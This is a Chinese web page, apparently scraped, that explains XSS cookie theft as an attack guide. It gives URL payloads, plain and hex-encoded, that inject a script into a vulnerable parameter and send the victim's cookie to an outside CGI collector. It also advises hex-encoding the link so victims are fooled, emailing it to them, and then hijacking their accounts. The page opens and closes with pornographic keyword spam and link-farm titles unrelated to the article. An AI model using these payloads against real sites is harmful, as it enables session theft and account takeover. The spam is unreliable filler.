亚洲一级电影在线观看,九九精品无码专区免费,亚洲AV无码资源在线观看 ,欧美国产高清

解釋一下XSS cookie盜竊是什么意思

時(shí)間:2023-02-10 14:09:25 筆試題目 我要投稿
  • 相關(guān)推薦

解釋一下XSS cookie盜竊是什么意思

  根據(jù)作為攻擊對(duì)象的Web程序,下面某些變量和插入位置可能需要進(jìn)行調(diào)整。要注意這只是攻擊方法的一個(gè)例子。在這個(gè)例子中,我們將利用腳本“a.php”中的 “viriable”變量中的跨站腳本漏洞,通過正常請(qǐng)求進(jìn)行攻擊。這是跨站腳本攻擊最常見的形式。

  第一步: 鎖定目標(biāo)

  當(dāng)你找到某個(gè)Web程序存在XSS漏洞之后,檢查一下它是否設(shè)置了cookie。如果在該網(wǎng)站的任何地方設(shè)置了cookie,那么就可以從用戶那里盜取它。

  第二步: 測(cè)試

  不同的攻擊方式將產(chǎn)生不同的XSS漏洞,所以應(yīng)適當(dāng)進(jìn)行測(cè)試以使得輸出結(jié)果看起來像是正常的。某些惡意腳本插入之后會(huì)破壞輸出的頁(yè)面。(為欺騙用戶,輸出結(jié)果非常重要,因此攻擊者有必要調(diào)整攻擊代碼使輸出看起來正常。)

  下一步你需要在鏈接至包含XSS漏洞的頁(yè)面的URL中插入 Javascript(或其他客戶端腳本)。下面列出了一些經(jīng)常用于測(cè)試XSS漏洞的鏈接。當(dāng)用戶點(diǎn)擊這些鏈接時(shí),用戶的cookie獎(jiǎng)被發(fā)送到 cgisecurity.com/cgi-bin/cookie.cgi 并被顯示。如果你看到顯示結(jié)果中包含了cookie信息,說明可能可以劫持該用戶的賬戶。

  盜取Cookie的Javascript示例。使用方法如下。

  ASCII用法

  http://host/a.php?variable=”>

  十六進(jìn)制用法

  http://host/a.php?variable=%22%3e%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%6c%6f

  %63%61%74%69%6f%6e%3d%27%68%74%74%70%3a%2f%2f%77%77%77%2e%63%67

  %69%73%65%63%75%72%69%74%79 %2e%63%6f%6d%2f%63%67%69%2d%62%69%6e%2f%63%6f

  %6f%6b%69%65%2e%63%67%69%3f%27%20%2b%64%6f%63% 75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3c%2f%73%63%72%69%70%74%3e

  注意: 每種用法都先寫為ASCII,再寫成十六進(jìn)制以便復(fù)制粘貼。

  1. “>

  HEX %22%3e%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e

  %6c%6f%63%61%74%69%6f%6e%3d%27 %68%74%74%70%3a%2f%2f%77%77%77%2e%63%67%69%73%65

  %63%75%72%69%74%79%2e%63%6f%6d%2f%63%67%69 %2d%62%69%6e%2f

  %63%6f%6f%6b%69%65%2e%63%67%69%3f%27%20%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f %6f%6b%69%65%3c%2f%73%63%72%69%70%74%3e

  2.

  HEX %3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%6c%6f

  %63%61%74%69%6f%6e%3d%27%68%74%74 %70%3a%2f%2f%77%77%77%2e%63%67%69%73%65%63%75%72

  %69%74%79%2e%63%6f%6d%2f%63%67%69%2d%62%69%6e %2f%63%6f%6f%6b

  %69%65%2e%63%67%69%3f%27%20%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3c %2f%73%63%72%69%70%74%3e

  3. >

  HEX %3e%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%6c

  %6f%63%61%74%69%6f%6e%3d%27%68%74 %74%70%3a%2f%2f%77%77%77%2e%63%67%69%73%65%63%75

  %72%69%74%79%2e%63%6f%6d%2f%63%67%69%2d%62%69 %6e%2f%63%6f%6f

  %6b%69%65%2e%63%67%69%3f%27%20%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65 %3c%2f%73%63%72%69%70%74%3e

  第三步: 執(zhí)行XSS

  將做好的URL通過電子郵件或其他方式發(fā)送出去。注意如果你直接將URL發(fā)送給其他人(通過電子郵件、即時(shí)通訊軟件或其他方式),你應(yīng)當(dāng)將其進(jìn)行十六進(jìn)制編碼,因?yàn)檫@些URL一眼便可看出包含惡意代碼,但經(jīng)過十六進(jìn)制編碼之后就可以欺騙大部分人。

  第四步: 處理收集到的信息

  一旦用戶點(diǎn)擊了你的URL,相應(yīng)數(shù)據(jù)就會(huì)被發(fā)送到你的CGI腳本中。這樣你就獲得了 cookie信息,然后你可以利用Websleuth之類的工具來檢查是否能盜取那個(gè)賬戶。

  在上面的例子中,我們僅僅將用戶帶到了 cookie.cgi頁(yè)面上。如果你有時(shí)間,你可以在CGI中將用戶重定向到原來的頁(yè)面上,即可在用戶不知不覺之中盜取信息。

  某些電子郵件程序在打開附件時(shí)會(huì)自動(dòng)執(zhí)行附件中的Javascript代碼。即使像Hotmail這樣的大型網(wǎng)站也是如此,不過它對(duì)附件內(nèi)容作了許多過濾以避免cookie被盜。

【解釋一下XSS cookie盜竊是什么意思】相關(guān)文章:

清明的意思是什么04-04

論民事盜竊與刑事盜竊的區(qū)分06-06

3.15是什么意思07-26

諺語是什么意思?07-23

諺語是什么意思11-08

小年是什么意思01-16

入伏是什么意思07-07

尾牙是什么意思10-20

小雪是什么意思?07-17

主站蜘蛛池模板: 精品国产三级在线观看| 国产拍在线| 亚洲日本va中文字幕婷婷| 国产精品盗摄!偷窥盗摄| 伊人伊成久久人综合网996| 中文有码无码人妻在线短视频| 四川丰满妇女毛片四川话| 欧美另类图片视频无弹跳第一页| 亚洲第一无码xxxxxx| 日本另类αv欧美另类aⅴ| 在线免费观看a视频| 亚洲欧美国产国产综合一区| 偷柏自拍亚洲综合在线| 国产好大好爽久久久久久久| 日本国产在线观看| 人妻系列无码专区2020| 豆国产96在线 | 亚洲| 夜夜偷天天爽夜夜爱| 丰满少妇被粗大猛烈进人高清| 无套内内射视频网站| 自偷自拍亚洲综合精品第一页| 欧美精品在线免费| 黄色网页在线播放| 国产午夜人做人免费视频网站| 国产三级精品三级男人的天堂| 国产精品久久久久9999吃药| 亚洲毛片网站| 国产人妻aⅴ色偷| 灯塔市| 国产一区免费在线观看| 亚洲欧美洲成人一区二区三区| 麻豆aⅴ精品无码一区二区| 国产91小视频在线观看| 天天干天天日夜夜操| 亚洲一区二区三区乱码在线欧洲| 99久久99久久精品免费看蜜桃 | 人与禽交av在线播放| 午夜在线观看免费线无码视频| 国产精品成人免费视频网站| 午夜在线不卡| 人妻丰满熟妞av无码区|